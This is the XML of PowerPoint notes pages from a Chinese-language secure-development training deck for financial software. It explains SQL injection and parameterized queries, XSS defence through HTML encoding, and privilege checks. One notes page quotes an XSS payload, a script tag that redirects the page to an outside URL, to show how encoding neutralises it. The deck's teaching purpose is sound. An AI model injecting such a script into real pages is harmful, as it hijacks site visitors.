                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US">
                <a:latin typeface="Calibri" panose="020F0502020204030204" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>弱口令</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" dirty="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333129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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4150435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Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>APP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服务端漏洞、微信小程序漏洞，都算</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A01C7B5F-6A46-7341-9207-C3D7F3B3484A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3315019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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="350776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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2460483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mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>【释义说明】</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>注入的产生原因是对客户端输入的参数没有做严格过滤，导致输入参数影响</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="zh-CN" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>操作语句的执行结果，暴露过多的敏感信息，解决的方法时加强参数过滤，采用参数化查询或存储过程查询。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>取得是通过容器的实现来取得通过类似</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>等方式传入的数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>PreparedStatement</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>l  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>它是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>接口的子接口；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>l  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>强大之处：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Ø  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>防</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>攻击；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Ø  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>提高代码的可读性、可维护性；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Ø  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>提高效率！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>前提：连接的数据库必须支持预处理！几乎没有不支持的！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>¨      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>每个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>pstmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>都与一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>模板绑定在一起，先把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>模板给数据库，数据库先进行校验，再进行编译。执行时只是把参数传递过去而已！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>¨      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>若二次执行时，就不用再次校验语法，也不用再次编译！直接执行！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66316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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418896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24</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="783609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我们知道如何攻击，就可以想办法修补了，我们首先要过滤特殊字符如：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;&gt;"",‘’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>空格等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这种方法我们叫他</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Html encode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>比如用户输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>window.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=”http://www.jwdstef.com”;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，保存后最终存储的会是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>lt;script&amp;gt;window.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>quot;http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>://www.jwdstef.com&amp;quot;&amp;lt;/script&amp;gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在展现时浏览器会对这些字符转换成文本内容显示，而不是一段可执行的代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>html encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实现方法比较简单，可以通过过滤器来实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>不论你项目使用的什么框架</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(servlet,struts2,springmvc)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>我们都可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>来实现。</a:t>
            </a:r>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25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1234011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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="862325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30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="429052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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3730619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22C366-1558-47FB-85AF-DB318DF83FAD}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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20748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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113551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kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>水平、垂直越权不需关注特定函数，只要在处理用户操作请求时查看是否有对当前登陆用户权限做校验</a:t>
            </a:r>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34</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143773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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166500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36</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1258657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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="782341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38</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3505621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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1520945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40</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1348721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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346463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传统业务产品，面向不同客户群，更加定制，营销细化；</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跨界业务产品更多，相比银行传统业务 ，开展理财、第三方支付、保险、商品等增多；</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业务分析 更加深入，指导支持业务管理决策；</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移动、生物识别、安全芯片、数据挖掘等部分已经应用到金融软件系统开发中。</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这一切都为金融软件产品开发提出了 更多 要求，投产更快、业务定向，使用便捷、高效、友好，性能稳定、更加安全。</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金融机构（银行、保险）等在如此的市场环境下，必须业务创新、必须技术提升 ，打造更透明、更便捷、更高效、</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2014 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>年起，金融业发展形势发生了巨大的变化。互联网金融的异军突起，使得银行业竞争更加激烈。</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业务驱动 ，更多定向营销、产品跨界、组合。传统金融产品、互联网金融产品</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新业务与新技术融合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技术驱动，互联网技术、移动技术、生物识别，大数据、云计算 ，软件科技变革</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开发项目 敏捷、软件定义 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>开发重点方向 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0"/>
              <a:t>新业务；新技术；</a:t>
            </a:r>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16D446B6-EAC4-4607-89DB-0623D206FF90}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="956917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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1497269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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1628312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47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1565882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49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2945829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51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1131553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53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2387278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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168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8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DF8EA1-C10B-4A11-B03E-D3196E70968D}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3151689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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169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9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B1A0C8-BC4C-4652-8999-5233A9506587}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3878882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p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171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1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83F0BF-980C-4115-9903-FCCA3C386EFC}" type="slidenum">
